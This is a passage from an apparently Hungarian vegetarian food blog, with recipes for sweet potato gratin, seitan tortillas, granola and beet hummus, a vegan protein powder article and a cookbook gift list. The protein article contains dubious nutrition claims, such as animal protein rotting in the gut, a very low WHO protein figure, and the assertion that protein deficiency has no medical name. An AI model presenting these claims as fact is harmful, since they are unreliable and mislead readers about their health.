káposzta, adjunk hozzá 2dl világos sört, majd hagyjuk tovább párolódni. Amikor már közel késznek érezzük, akkor tegyük bele a maradék 2dl világos sört és a két marék bulgurt. Miután a bulgur megpuhult, vegyük le a tűzről, hagyjuk hűlni és fogyasszuk főételként vagy köretként. Én sült krumplit és szójás olívaolajban sült tofu szeleteket készítettem mellé. Gyors, egyszerű és laktató ebéd. Jó étvágyat!
Édesburgonya - padlizsán gratin, azaz a csőben sült verzió (gluténmentes, tojásmentes)
2016. február 11. Zöld Avocado
Egy kis technikai szünet után (úgy kezdődött, hogy takarítottam, és úgy végződött, hogy csúnyán lezuhant a laptopom a földre:-( ) újabb, gyorsan elkészíthető, egyszerű, glutén- és tojásmentes, vegánosítható recepttel készültem nektek itt a Zöld Avocado vegetáriánus gasztroblogon. Nem lett olyan szép, mint, amilyen a fejemben volt, de nagyon finom! :-) édesburgonya-padlizsán gratin (tojás- és gluténmentes) A szubtrópusi területeken az egyik legfontosabb népélelmezési cikk az édesburgonya, mely Magyarországon is egyre népszerűbb, és egyre több helyen lehet hozzájutni. Bár az ára még hagy némi kívánnivalót maga után, azért ne ijedjünk meg a burgonya szó hallatán. Közel sincs szükségünk édesburgonyából akkora mennyiségre, mint amihez a hagyományos burgonyavásárláskor szoktunk. Sőt mi több! Valójában az édesburgonya nem is burgonya, és inkább hasonlít a sütőtökhöz, mint a krumplihoz. Fogyaszthatjuk sütve, főzve, készíthetünk belőle töltött burgonyát, rakottakat, krumplipürét, de még édességeket, pitéket is. ;-) Magas szénhidrát tartalma ellenére én szívesen ajánlom mindenkinek, mert nagyon könnyen emészthető, magas rosttartalmú zöldségről van szó, melynek tápanyagi hasznosulnak a szervezetben, a felesleg pedig távozik a testből, és nem rakódik le zsírpárnák formájában. :-) Édes íze miatt azt hinnénk, hogy a cukorbetegeknek tiltólistás alapanyag. Ez tévedés! A diabétesszel küzdők számára egyenesen ajánlott az édesburgonya fogyasztása. (Bővebben a témáról itt olvashattok!) Vélhetően a népszerűséggel, a kínálat is nőni fog, több kereskedőtől beszerezhető lesz majd, és talán így az ára is lejjebb megy, hogy mindenki számára elérhető legyen, mert rengeteg jótékony tulajdonsága van. Nyugat-európa már itt tart! :-) Például Írországban a hagyományos burgonyafogyasztás visszaszorult, és hetente akár többször is kerül az asztalra ebből a finom, édes és csodaszép burgonyából, melyet batáta néven is kereshetünk a zöldségesnél. édesburgonya / batáta Miért hasznos tápanyagforrás az édesburgonya? "Az édesburgonya húsos, gumószerűen megvastagodott gyökere szénhidrátban és (különösen a sárga húsú fajta) béta-karotinban gazdag. C-vitamin-tartalma 15-30 mg/100 g, de tartalmaz B1, B2, B6, és E vitaminokat is. A többi zöldségféléhez képest sok, 1,5-2 g/100 g fehérje található benne, amelynek összetétele a tojáséhoz hasonló. Délkelet-Ázsiában a zsenge leveleit, hajtásait is fogyasztják, ezekben a gyökerénél is több a C-vitamin és a béta-karotin. Értékes ásványi anyagokat tartalmaz: kalcium, vas, magnézium, mangán, kálium, foszfor, nátrium, szelén, réz és cink is található benne. Egy perui kutatóközpont, a Limában működő Nemzetközi Burgonyaközpont (CIP) szakértője, Daniel Reynoso Tantalean az édesburgonyával foglalkozó tanulmányában azt állítja, hogy a batátának gazdag ásványi anyagtartalma miatt daganatmegelőző hatása is van, csökkenti a gyomorrák és a májbetegségek kockázatát és antioxidánsai, vitaminjai és proteinjei segítenek megőrizni a fiatalságot. Energiatartalma száz grammban 117 kalória, így akár a fogyókúrázók is beleilleszthetik az étrendjükbe. " Forrás: Házipatika édesburgonya-padlizsán gratin (tojás- és gluténmentes) HOZZÁVALÓK (4 személyre) - 500 g édesburgonya / batáta - 1 db nagyobb méretű padlizsán - 200 g kecskesajt - 2 dl főzőtejszín (én szóját használtam) - 1 dl tetszés szerinti tej (én rizstejet használtam) - 2-3 gerezd fokhagyma - 1 tk Himalája só, 1 kk őrölt fehér bors, 1 ek szárított oregánó, csipet őrölt szerecsendió édesburgonya-padlizsán gratin (tojás- és gluténmentes) ELKÉSZÍTÉS A burgonyát és a padlizsánt meghámozzuk, majd vékony karikákra felvágjuk. Egy jénai tálat vékonyan k ikenünk kókuszzsírral, és elkezdjük belerétegezni az édesburgonyát és a padlizsánt egymás után. Ezt megtehetjük állítva, egymás mellé téve és fektetve, egymásra rétegezve is (mint a rakott krumpli). Amihez éppen kedvünk van. ;-) állítva fektetve, rétegezve A szószhoz feltesszük a főzőtejszínt egy lábasban melegedni. Hozzáadjuk az apróra vágott (tépkedett) kecskesajtot, a tejet, és a fűszereket. Közepes lángon addig kevergetjük, míg a kecskesajt teljesen szétmálik, és egynemű öntetet nem kapunk. Amint ezt elértük, nyakon borítjuk vele a jénaiba helyezett burgonya és padlizsán szeletek. A jénait lefedjük alufóliával, és 220 °C - ra előmelegített sütőben kb. 35-40 perc alatt puhára sütjük az egytálételünket. A végeredmény egy édeskés-sajtos olaszos íz, amit nehéz abbahagyni. édesburgonya-padlizsán gratin (tojás- és gluténmentes) Táplálkozzunk, ne csak együnk! :-) Megjegyzés: Az étel könnyedén vegánosítható, vagy átalakítható egyszerű köretté, a főétel helyett. Hagyjuk el a kecskesajtot, az öntetet készítsük növényi tejből és szójából készült tejszínből, majd szórjuk meg a megsült és kész ételt sörélesztőpehellyel, sóval, frissen őrölt fekete borssal. Vagy egyszerűen csak locsoljuk meg a padlizsán- és édesburgonya szeleteket fűszeres olívaolajjal. Majd süssük készre őket. Így az egytálétel, akár köretként is szerepelhet az asztalon.
Hagymás-tofus édesburgonya
A következő ételnek számomra az a különlegessége, hogy selyem tofuval készült. Magyarországon jellemzően nem elterjedt a selyem tofu, bár vannak helyek, ahol ezt is be lehet szerezni. A selyem tofunak találó a neve, hiszen rendkívül lágy állaga és selymes íze van, mint egy pudingnak. Főként nyáron szoktak ilyet készíteni, de eleve légmentesen zárt műanyag dobozokban kerül forgalomba, így felbontás nélkül akár fél évet is eláll a hűtőben. Selymes, szilárdabb puding-állagából adódik, hogy leginkább cukrásztermékekhez használják. Remek krémeket lehet belőle készíteni sütemények töltésére. Most azonban mégis maradtam a főételeknél, s batátával sütöttem össze. A batáta is lágyabb növény, jól passzolt a kettő, a tofun túl a hagymákkal és kakukkfűvel megfűszerezve egyszerű de fenséges ételt kapunk. Könnyen kedvencünkké válhat. A recept: Hozzávalók: - 3-4 db batáta (édesburgonya) - 1-2 db lila hagyma - 1 selyemtofu - 1/2 póréhagyma - 1 selyemtofu - só - kakukkfű Elkészítés: Az édesburgonyát megpucoljuk, hosszabb hasábokra vágjuk. Minimális vízen, enyhén megsózva kicsit megpároljuk. Közben a hagymákat és a selyemtofut felszeleteljük nagyobb darabokra. A félkeményre puhult édesburgonyát leszűrjük, kakukkfűvel és kevés sóval összeforgatjuk. Egy tepsit sütőpapírral vagy alufóliával kibélelünk, beletesszük a megfűszerezett batátagerezdeket, rászórjuk a feldarabolt tofut és hagymákat. Kb. 20 perc alatt készre sütjük. Köretnek vagy önálló ételnek is megfelel. Selyemtofu helyett füstölt tofut vagy bármilyen más tofut is használhatunk. (Angliában valahogy könnyebb beszerezni a selyemtofut.)
Ha üres a kamra
Kétségtelen, de a zöldségalapú táplálkozásnak a legnagyobb kihívás a téli hónapok. A napfényes órák száma minimális, a friss levegőn való szabad mozgás korlátokba ütközik és mellé még ott van plusz frusztrációnak az egyre üresedő kamrapolc. Ebben a színtelenségben kénytelenek vagyunk ökológia lábnyomunkat növelve olyan termékeket is megvásárolni, ami több ezer (tízezer!) kilómétert utazott a multi polcáig, vagy?! Válasszuk a B verziót! Főzzünk tápláló ételt abból amink van a konyhatechnika és a fűszerek változatosságát kihasználva. Három könnyen beszerezhető alapanyagot választottam ennek bemutatására: cékla, burgonya és alma a hozzávalóim. Nem kell megijedni, nem bébipürét fogunk készíteni belőlük! Az innováció az egyik kedvenc játékom, (nem csak) a konyha területén, amikor egy régi, hagyományos ételt új, táplálkozástudományi alapon korszerűbb konyhatechnikával készítünk el, a fantáziánkat is igénybe véve, ízeket, fűszereket harmóniába állítva, ügyelve a részletekre. Nyilván az ízlés szubjektív dolog, így a recept legyen puszta útmutatás, ahogy én szeretem. A régi étel, amit megújítunk nem más, mint a beré, tócsni, krumplilángos... azt hiszem ezt az ételt, ahány konyha, annyi elnevezés illeti. Internetes barátunk szerint : ,, A legvalószínűbb feltételezés szerint a tótlángos névből alakulhatott ki a tócsni név, ami Magyarországon a lapcsánka név után a legelterjedtebb. Az alaprecept a legszegényesebb időket idézi, de a népi találékonyság mindig azzal egészítette ki, amihez éppen hozzá tudott jutni. A korszerű táplálkozás kevésbé preferálja a bő zsiradékban sütést, mint konyhatechnikai folyamatot. Sajnos ennek az ételnek a készítése során az alapanyagok nagy mennyiségben magukba szívják az olajat és ezen a papírtörlővel való leitatás sem segít. Próbáljuk ki a sütőpapírral bélelt sütőlemezen való elkészítést. Meglepő, de nem lesz száraz a végeredmény, a lepények átsülnek, ropogósak és egyben könnyebben emészthetőbbek a szervezetünk számára. Burgonyalepény hozzávalói (4 főre): - 50 dkg burgonya - 10 cm-es darab póréhagyma - 8 dkg rizsliszt - 1 tojás ( pár ek. vízzel kiváltható ) - só, bors, frissen őrölt szerecsendió - 1 dkg vaj vagy kókuszzsír Céklás hummusz: - közepes sült cékla - 1 gerezd fokhagyma - 1 ek. extra szűz olívaolaj - 1/2 tk. római kömény - 10 dkg főtt csicseriborsó - 1 ek. tahini paszta ( vagy száraz serpenyőben megpirított szezámmag ) - 1 tk. citromlé - só, frissen őrölt bors - víz Forró fahájas alma: - 2 alma - 1 ek. méz - 1 tk. kókuszolaj vagy vaj - őrölt fahéj Tálaláshoz hirtelen sütött zsályaleveleket javaslok. Hámozzuk meg a burgonyát és ha nem ipari mennyiséget készítünk, akkor a nagy lyukú reszelő helyett válasszuk a julienne=gyufaszálra darabolást. Az eredmény egy szofisztikáltabb küllemű lepény lesz. A hagymát is vágjuk apró kockákra. Egy tálba keverjük össze a liszttel, tojással és fűszerekkel, majd kb. 10 cm átmérőjű lepényeket formázzunk vizes kézzel és sorakoztassuk a sütőlemezre. Minden egyes lepény közepére tegyünk egy kis darab vajforgácsot, majd mehet 20-25 percre a 175 fokra előmelegített sütőbe. Aki megfogadta a rovat eddig megjelent számainak praktikáit, az most a hűtőből előveszi a sült céklát, mert ahogy már mondottam, annak minden hűtőben lenni kell... Ennek elmulasztása esetén a céklát alaposan tisztítsuk meg a föld szennyeződéstől és csomagoljuk be alufóliába. Süssük 60-70 percig 200 fokon. Ez így nem túl gazdaságos folyamat, ezért is érdemes megfogadni, hogy a hétvégi konyhaüzemben, amikor több étel, sütemény készül, ugyanezen hőmennyiséggel a sült céklák is elkészülhetnek, az egyéb ételek mellett. A kihűlt céklákat megpucoljuk és a többi hozzávalóval egy tölcséres turmixban simára járatjuk. Vizet apránként adagoljuk hozzá, kizárólag annyit, amennyi a krémes állaghoz szükséges. Az almát vágjuk gerezdekre, majd keresztbe vékony szeletekre. Egy teflon serpenyőben olvasszuk fel a zsiradékot és dobjuk rá az almát, szórjuk meg bőségesen fahéjjal. Az almákat kb. öt perc alatt pirítsuk meg, a végén csurgassuk rá a mézet. Forrón tálaljuk a burgonya lepények mellé halmozva. Egyszerű és színes fogás ebben a szürke télben. Jó étvágyat hozzá! forrás: Krautkopf ?
Tortilla rántott szejtáncsíkokkal
A vasárnapi rántott hús élményétől még a legvérmesebb vegánok sem mentesültek életük során. Szintén minimálisra tehető azon szerencsések száma, akiknek nagyanyja épp nem a Jó ebédhez szól a nótát bőgette, miközben az olajszag mustárgázként terjedt a lakásban. És ha már itt tartunk, kötelességem mellékesen értekezni a magyarnóta videó műfajáról. Vegyük pl. az alábbit: a szemüveges, bongyor vadgalamb Fruttiból szőtt zakójában és Foxi Maxi csokornyakkendőjében turbékol szíve hölgyének, aki nem hogy nem tömi ki őt, de még a boroskancsót sem húzza a fejébe. Na, a hasonló élményeket megsemmisítendő, megpróbálkoztam a rántott szejtánnal oly módon, hogy még véletlenül se köszönjenek vissza a nyomasztó vasárnapi emlékek. És most az akciórész: Zutaten: A szejtájhoz: 200g szejtánpor 90g tönkölyliszt 2,5 langyos víz só, fűszerek ízlés szerint (tárkony, rozmaring, fokhagymapor javallott) 100 g zsemlemorzsa 2 dl szójatej 100g fehérliszt 4dl étolaj A salsához: 6 db paradicsom 1 csokor koriander 1 vöröshagyma 2 jalapeno vagy hegyes erőspaprika 1 nagy gerezd fokhagyma 1 lime leve kevés olívaolaj só, bors 5-6 tortillalap A szejtánport, a lisztet és a fűszereket összekeverjük, hozzáadjuk a vizet, és robosztus mozdulatokkal gyorsan összegyúrjuk. Fél órát pihentessük. (Kijelentő mód.) A szejtánt horizontálisan 1-2 cm vastag szeletekre vágjuk, majd feltesszük főni, a vizet szintén fűszerezzük. Miután felforrt, közepes lángon további fél órán át főzzük. Ha elkészült, kivesszük a vízből, hagyjuk kihűlni, majd húsklopfolóval kilapítjuk. (Lehetőség szerint társasházban a konyhakövön, vasárnap reggel hatkor.) A szejtánszeleteket először lisztben, majd szójatejben és zsemlemorzsában megforgatjuk, végül bő, forró étolajban kisütjük, világos? Ha megsült, 2-3 cm vastag csíkokra vágjuk. Közben a zöldségeket apróra vágjuk, a hagymát felcsíkozzuk, egy tálban összekeverjük, majd miután belefacsartuk egy lime levét, sózzuk és borsozzuk. Tortillába tekerve szervírozzuk, ha jót akarunk.
A vegán fehérjepor előnyei és fajtái
Számos féle-fajta vegán fehérjepor található a boltokban. De melyik a jobb, és ha jobb miért jobb? Egyáltalán szüksége van a szervezetnek bármilyen fehérjeporra? A következő vegán fehérjepor termékek kaphatóak a magyar piacon: AbsoRice vegán fehérjeporok – csokoládé, kapuccsínó, vanília, eper, kakaókrém ízesítésben Barna rizs fehérje (Naturize) Chia mag fehérjepor (Dragon Superfood) Kendermag Protein (Green Origins) Protein Smoothie (Meal Balance) RAW protein (Garden of life) – vanília, csokoládé, natúr Rizs fehérje (BioTech) – erdei gyümölcs, csokoládé-fahéj ízesítésben Szójafehérje izolátum (Dénes-Natura) Vegan Protein (Triplex) – áfonya, vanília, csokoládé ízesítésben Vegán Protein (Vegabond) – vaníliás, csokis, chai ízesítésben Vegan Protein Fusion (Peak) – natúr, csokoládé ízesítésben (A nevekre kattintva tudjátok megnézni a termékjellemzőket.) Azonban mielőtt vásárlásba kezdtek engedjétek meg, hogy a vegán fehérjepor témájával kapcsolatban feltegyek és megválaszoljak pár kérdést. Miért vegán fehérjepor? Az állati fehérjék emésztése nem megy könnyedén a szervezet számára. Mivel teljesen rostmentes mindennemű állati táplálék, így az nehezíti és lassítja az emésztést, ráadásul a fel nem használt tápanyag gyors rothadásnak indul a belekben, mely folyamat olyan toxinokat szabadít fel, melyet összekötnek többek között a vastagbélrák kialakulásával. Ami még problémát jelent, hogy minél nagyobb mennyiségben vesz magához az ember rostmentes állati eredetű táplálékot, annál lassabbá válik az emésztés és annál hosszabb ideig szívódnak fel a rothasztó baktériumok által termelt toxinok. Ezt a helyzetet tovább súlyosbítja a mozgáshiány és az ülőmunka is. Az emberi bélrendszer hosszúsága sem a gyors fehérje emésztést támogatja, de erről bővebben a húsevő az ember című cikkemben írok. A tejmentes vegán fehérjepor előnye A fehérjeporok nagy százaléka tejből készül. Ami azért problémás, mivel sok ember érzékeny a tejben lévő, úgynevezett tejcukorra, a laktózra. Sőt, a tejben van egy kazein nevű fehérje, mely egy lassú felszívódású lánc és mely bezavarja gyorsfelszívódású fehérjék hasznosulását. A testépítők többek között a kazein miatt isszák inkább vízzel a fehérjeporokat, nem pedig tejjel. Visszatérve, a tejből készült fehérjeporok ugyan kis mennyiségben, de ugyanúgy tartalmaznak laktózt. Ezzel a kisebb mennyiséggel játszva megbirkózik a szervezet, de hosszútávon olyan néma allergiás mellékhatásai lehetnek, mint pl.: porallergia, illetve agresszív laktóz vagy akár tejérzékenység. Ilyen hosszútávú mellékhatással egy vegán fehérjepor sem rendelkezik. Emellett a tehenekbe pumpált növekedési hormonok, valamint a gyógyszerek és antibiotikumok bomlási termékei is nagy mértékben kerülnek be a tej és tejkészítményeken keresztül. A vegán fehérjepor rosszabb felszívódást produkál? Régebben sok helyről hallottam, hogy a növényi alapú fehérjeporok sokkal rosszabb felszívódást produkálnak mint az állati eredetű fehérjeporok. 2013-ban készült egy tanulmány mely konkrétan a teljes rizsszemből készült proteinpor kontra tejsavó proteinpor felszívódásának eredményességét vizsgáló kutatás eredményeit mutatja be. A kísérletek bebizonyították, hogy nincs mérvadó különbség a különböző eredetű fehérjeporok felszívódásának tekintetében. A vizsgálat kifejezetten teljes szemből készült rizs proteinnel zajlott, így a szója, lenmag, chia mag és egyéb növényi alapú vegán fehérjeporok felszívódási hatékonyságát még nem tudjuk biztosan. Miért nem javaslom a fehérjeporok szedését? Egyszerűen fogalmazva nincs rá szükség. A felnőtt ember fehérjeigénye nagyon alacsony, és ez az igény a testépítőknél sem nő drasztikusan. Ami veszélyessé teszi a fehérjefogyasztást az az a tény, hogy túlzott fehérjefogyasztás terheli a veséket többek között. Ez alól nem kivétel a vegán fehérjepor sem, az is fehérje, és ha túlléped a maximális szintet, bizony az is terheli a vesédet. A WHO hivatalos publikációban közölte ezeket a számokat: egy felnőtt ember protein szükséglete 0,35g testsúly kilogrammonként; súlyzós edzés mellett ez mindösszesen 1,35g-ra növekszik testsúly kilogrammonként. Ezen számok az elhízott embereknél nem relevánsak. További, konkrétan a fehérjeigénnyel és az ételek fehérjetartalmával foglalkozó cikket hamarosan publikálok. Tisztán növényi alapú étrenddel bevihető az a fehérje mennyiség és minőség melyre a szervezetnek szüksége van. Emellett, hogy mennyire garantált a dobozon feltüntetett beltartalom és aminosav profil, azt is gyártója válogatja. Vannak egészen szép eredményeket hozó, és az ellenőrzéseken csúnyán elbukó gyártók egyaránt. Ebben a témában számos, főleg angol nyelvű tesztet lehet olvasni. Legvégül pedig engedj meg egy kérdést: Hallottál már valaha krónikus fehérjehiányról mint betegségről? Na és fehérjemérgezésről? A fehérjehiányra mint olyanra nincs orvosi terminológia. Az éhező országokban komplett tápanyag és fehérjehiány van, de az más. Mi nem éhezünk. A fehérjemérgezés azonban ismert és előszele lehet a vesekárosodásnak. Miért fontos tudni ezt? Mivel az emberi minimum fehérjeigény és a túlzott fehérjebevitel szintje között bizony nagyon vékony a határ és könnyen túlzásba lehet esni még növényi étrenddel is. Főleg, ha vegán fehérjepor is szerepel a napi étrendben.
Citromos fügelekvárral vagy anélkül...
Egy írás szerint: ,,Az amerikaiak a zabpelyhet úgy eszik, hogy megfőzik előbb, vagy sütőben megpirítják. Nocsak, ezek az amcsik tudnak valamit, nem eszik a gabonát nyersen! A főtt változat egyszerű magyar kifejezéssel illetve nem más, mint a zabkása. A boltok polcán lévő (hőkezelés nélküli ) müzlik helyett pedig bátran fogjunk bele a crunchy granola, magyarul ropogós müzli készítésébe. Kis mennyiséggel nem érdemes bajlódni, a sült müzli légmentes üvegekben 1-2 hétig eláll, bár a szavatossági időt otthoni körülmények között még nem sikerült tesztelnem, a gyerekek mindig hamarabb megették a lesütött adagot. Banános granola: 250 g zabpehely 80 g durvára vágott mandula 80 g tökmag, napraforgó 2 nagyon érett banán 3 ek. kókuszolaj 2 ek. méz vagy juharszirup 1/2 tk. vanília őrlemény csipet só ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Béleljünk ki egy tepsit sütőpapírral és melegítsük elő a sütőt 175 fokra. Egy nagy tálba keverjük össze a száraz hozzávalókat, míg egy kisebb edénybe a folyékonyakat. A kezünkkel alaposan dolgozzuk össze a száraz és a nedves hozzávalókat. A banánt villával pürésítsük és azt is keverjük hozzá a masszához, majd egyenletes rétegben terítsük el a sütőlemezen. Süssük 15-20 percig, de félidőkor keverjük át egyszer. Folyamatosan ellenőrizzük, mert a méz miatt könnyen megéghet. Hagyjuk teljesen kihűlni és csak ezután tegyük légmentesen zárható üvegbe. Aszalványokkal dúsíthatjuk ( pl. mazsola, aszaltáfonya, aszaltmeggy, aszaltananász, stb ). Csokirajongók durvára vágott csokidarabokat is tehetnek a keverékbe. Ráérős reggeleken királyi módon tálalhatjuk a granolát. Ehhez egy szuperfoodnak felcimkézett élelmiszert ajánlok, a chia magot: nagy erőt egy piciny magban. Az ára senkit ne riasszon vissza, cirka 100 Ft-ba kerül napi egy evőkanálnyi adag, amiről azt kell tudni, hogy teljes értékű fehérjeforrás, kitűnő rostforrás, tele van kalciummal és ötszörös mennyiségű vas van benne, mint a spenótban. Az ételek ízét nem befolyásolja, teljesen semleges ízű. Ár-érték aránya magasan a péksütemények felett áll. Chia puding: 250 ml tej ( opcionálisan zab-,rizs- vagy mandulatejet ) 4 ek. chia mag 1/2 citrom héja ( bio) Meleg alma-mag keverék: 1-2 ek. vaj vagy kókuszolaj 1-2 ek. méz vagy juharszirup 1 nagy alma 50 g napraforgó, 50 g tökmag, 50 g szezámmag 1/2 tk. fahéj csipet őrölt gyömbér csipet só --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- A chia puding hozzávalóit alaposan összekeverjük és hagyjuk állni a hűtőben, hogy a magok megduzzadjanak. A meleg almás keveréket egy teflonos serpenyőben készítjük el. Felolvasztjuk a zsiradékot és rádobjuk az apró kockákra vágott almát a magokkal és a fűszerekkel. 5 percig pároljuk, míg az alma kicsit karamellizálódik, a magok pedig ropogóssá válnak. Ezek után jöhet a rétegezés poharakba. Alulra egy kanál chia puding ( koncentrált erő ), majd néhány kanál natúr joghurt. Mindezek tetejébe az előre elkészített granola, majd a meleg alma-mag keverék. Ha a kamra polcán találunk dugiban lekvárkülönlegességet, azt is vegyük elő. Mondjuk egy cukormentes citromos füge lekvárhoz mit szóltok? Januárban mi így indítottuk az évet. Mit is kívánhatnék ennél többet: chia magban és granolában gazdagot! Tipp: kisebb, zárható üvegben rétegezve magunkkal vihetjük, szorgos munkanapok tízóraijának kitűnő, csak a kanalat ne feledjük otthon. forrás: green kitchen stories
Vegetáriánus, vegán szakácskönyv ajánló (karácsonyra)
2015. december 18. Zizi kalandjai
Tavaly is összeállítottam egy listát az éppen aktuális könyvekről, abból is csemegézhettek, ugyanis nem vesztette aktualitását, az ott ajánlott könyvek még mindig top listás példányok. A mostani listában főleg olyanok lesznek, amik az elmúlt időszakban jelentek meg, de lesznek olyanok is, amik ezután fognak megjelenni, jövő év elején – szóval ezek nem lehetnek a karácsonyfa alatt, de érdemes rájuk figyelni, esetleg előrendelni őket. Az általam választott könyvek többsége továbbra is angol nyelvű, de a listára tettem néhány magyar nyelvűt is. Külön linkeket nem szúrok be a könyvekhez, mert több helyen kaphatók, megrendelhetők (idegen nyelvű könyvesboltok, Alexandra, Bookline, Amazon - USA, Amazon - Anglia, Book Depository, Barnes & Noble), mindenki keressen rá és válassza ki a számára megfelelő forrást. És akkor íme a lista… Ella Woodward: Deliciously Ella Ella könyve tavasszal jelent meg és mivel követem már egy ideje a blogját és nézem a recept videóit, így egyből lecsaptam rá, ha jól emlékszem elő is rendeltem, hogy ahogy megjelenik, azonnal hozzájuthassak egy példányhoz (kétféle borítóval kapható figyeljetek rá! – az amerikai változatot nem érdemes megrendelni, mert át kell számolni a mértékegységeket). A bevezetőből megismerhetjük Ella történetét, hogy hogyan is jutott el egy súlyos betegségtől és egészségtelen táplálkozástól a vegán, gluténmentes étrend irányába. Gyorsan, könnyen elkészíthető receptek vannak benne, a könyv végén pedig menüket állított össze a könyvben szereplő receptekből. Jó hír az angolul nem tudóknak, hogy néhány hete a könyv megjelent magyarul is. Ella Woodward: Deliciously Ella Every Day És íme a folytatás… Ella második könyve, amely 2016. január 21-én jelenik meg. Ha jól tudom, ez is vegán és gluténmentes könyv lesz. Már előrendelhető a nemzetközi könyvárus oldalakon. Én biztosan nem fogok lemaradni az első szállítmányról! Andrea Duclos: The Plantiful Table Drea vegán szakácskönyve, a The Plantiful Table a napokban jelent meg. Imádom a blogját, már évek óta olvasom, amelyen a recepteken kívül életmód és szülő (anya), gyerek témákat is érint. Egy színes kis meseország a blogja, gondolom a könyve is ilyen lesz. Én előrendeltem és már úton van a könyv, a Jézuskám repíti a karácsonyfa alá. Food52: Vegan Cookbook Food52 egy gasztronómiával foglalkozó amerikai oldal, tele sok-sok recepttel, külön vegán szekcióval. Egyik szerzőjük, Gena Hamshaw – akinek a blogját követem már évek óta – állította össze 60 csodás vegán recepttel. Izgalmas könyv lehet! Heidi Swanson: Near & Far Heidi írja 2003 óta a világhírű 101 Cookbooks nevű blogot, hihetetlen sok recepttel. Super Natural Every Day című könyve volt az első, amit megvettem és amelyből sok-sok recept elkészült azóta. A nemrég megjelent Near & Far című könyve az utazásait öleli fel és az ezekből merített inspirációkat, amelyekből a könyvben megjelent receptek is születtek. Heidi-re oly jellemző gyönyörű fotókkal színezve ez a könyv igazi csemege vegetáriánusoknak. Van benne vegán recept is, jó néhány pedig vegánosítható. Nekem a korai Jézuskám meghozta a fa alá ezt a gyönyörű könyvet! Sara Forte: The Sprouted Kitchen Bowl + Spoon Sara első könyve, a The Sprouted Kitchen (A Tastier Take On Whole Foods) már elég régóta megvan, csodás fotók és receptek vannak benne. Ezzel a könyvével is szemezek már egy ideje… vegetáriánus, vegán receptek vannak benne, a gyönyörű képekről pedig Sara férje, Hugh gondoskodik. A blogja alapján meggyőződhettek az ínycsiklandó ételekről, amelyeket Sara készít. Julie Cove: Eat Better Live Better Feel Better Julie-val egy fantasztikus történetünk van arról, hogy hogyan is ismerkedtünk meg az internetnek (vagyis a blogjainknak) köszönhetően, hogyan utazott el a húgával Budapestre, majd Szegedre és, hogy hogyan is segítettem nekik megkeresni az évtizedek óta elveszett magyar, szegedi családtagjaikat. Visszautazásuk előtti utolsó napon találtuk meg a rokonokat és könnyek között öleltük át őket a megtalálásuk pillanatában. Fantasztikus élmény volt, életem egyik legmeghatározóbb eseménye és nagyon boldog vagyok, hogy részt vehettem egy család boldog egyesítésében. Talán egyszer megírom ezt a hihetetlen történetet a blogra is, most viszont íme itt van Julie első könyve. Azt hiszem a borítója az egyik leggyönyörűbb szakácskönyv borító, amit valaha láttam és maximálisan tükrözi Julie-t és munkáját. Vegán, nyers szakácskönyve tele lesz sok-sok az egészséges táplálkozást érintő információkkal, a saját útjával – ő hogyan gyógyult meg ennek a táplálkozási formának köszönhetően – és természetesen receptekkel. A könyv 2016. március 1-jén jelenik meg, már előrendelhető az Amazonon. Anna Jones: A Modern Way To Cook Jamie Oliver felfedezettje, vagyis pályáját a Fifteen étteremben kezdte a mentor szakács képzésen. Közben kezdett el foglalkozni az egészséges táplálkozással és lett vegetáriánus. Első könyve – ami szintén vegetáriánus -, A Modern Way To Eat tavaly júniusban jelent meg, ezt követte elég gyorsan egy évvel később, a Modern Way To Cook. Ha lesz egy saját szakácskönyv polcom végre, ahova korlátlanul (esetleg enyhén korlátozottan! ) vásárolhatok könyveket, akkor biztosan meg fogom rendelni legalább az egyik könyvet… mondom, legalább az egyiket! Sarah Britton: My New Roots Annyira imádom Sarah blogját, hogy kérdés nem volt: azonnal előrendelem a könyvét, amint lehet (idén tavasszal jelent meg). A receptek többsége vegán, vannak gluténmentesek is és talán néhány vegetáriánus. Szuper könyv, gyönyörű fotókkal, ám néhány recept időigényesebb (alapanyagok beszerezését vagy az elkészítést illetően), szóval az igazi nagy főzések/sütések ebből a könyvből váratnak még magukra. A könnyebbeket igyekszem minél előbb kipróbálni. Emma Galloway: My Darling Lemon Thyme Nagyon szeretem Emma blogját. Ő új-zélandi, azonban a férje ázsiai származású (ha jól tudom, fülöp-szigeteki), így ennek köszönhetően a vegetáriánus, gluténmentes konyhát ötvözi az ázsiaival, így szuper jó kis receptek kerülnek ki a blogjára, bőven lehet inspirálódni belőle. Jamie Oliver: Everyday Superfood Hát ez még mindig nem az oly régóta beharangozott vegetáriánus szakácskönyve Jamie-nek (ezért egy kicsit kakukktojás a listán), viszont van benne sok vegetáriánus és vegán, talán még gluténmentes recept is. A könyv érdekessége, hogy kivételesen nem az állandó fotósa David Loftus készítette a kaja fotókat, hanem maga Jamie. Jó styling, fincsi kaják, sok recept! (Ehhez nagyon hasonló Donal Skehan legújabb könyve is, a Fresh, amely szintén nem vegetáriánus, de vannak benne ilyen receptek is!). Deborah Madison: Vegetable Literacy Már régóta szemezek ezzel a könyvvel, nagyon sok helyen láttam ajánlani, ahol a vegetáriánus, vegán konyhára hivatkoznak, hogy ez egy elég alapműnek számító könyv. Ha nagyobb lesz a könyvespolcom, biztosan beszerzem! Steiner Kristóf: Kristóf Konyhája Lénárt Gitta és Stőhr Gréta után végre egy újabb magyar nyelvű magyar szerző által írt vegán szakácskönyv a piacon… Kristóf első szakácskönyve, természetesen tele vegán receptekkel (108 db!). Kezdő konyhatündéreknek és természetesen nemcsak vegánoknak ajánlja könyvét. Kristóf szerint “Ez a könyv azért született, hogy megmutassa: főzni bizony bárki tud, és egy szempillantás alatt is lehet lenyűgözően finom, egészséges lakomákat rittyenteni.” Nagyon kíváncsi vagyok a könyvre, feltétlen be akarom szerezni (itt és itt is éppen akciósak)! Adele McConnell: Vegán Szakácskönyv Elég egyértelműen kitalálható, hogy egy vegán szakácskönyvről van szó. A szerző száz, különböző nehézségi fokú receptet ajánl, s körutazásra invitál minket a gasztronómia világába. A hagyományos fogások mellett ínycsiklandozó marokkói, mexikói, thai, indiai és japán ételek közül válogatva új ízeket, illatokat, világokat ismerhetünk meg. Átpörgettem már a könyvet, de nincsen meg. Aki teljesen kezdő a vegetáriánus, vegán konyhában, annak nagy segítséget jelenthet Adele könyve. Áine Carlin: Legyen Vegán! Egyre több magyar kiadó jelentet meg vegetáriánus, vegán szakácskönyveket, még, ha azok többsége idegen nyelvről lett is lefordítva, de úgy tűnik, hogy van rá igény! Áine szakszerűen avatja be az olvasót a vegán étkezés 